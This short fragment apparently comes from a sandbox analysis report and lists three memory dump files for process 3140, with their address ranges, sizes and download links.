        • memory/3140-12-0x00007FFBD7890000-0x00007FFBD8351000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3140-11-0x00007FFBD7890000-0x00007FFBD8351000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3140-1-0x0000014463B60000-0x0000014463B82000-memory.dmp

          Filesize

          136KB

          Download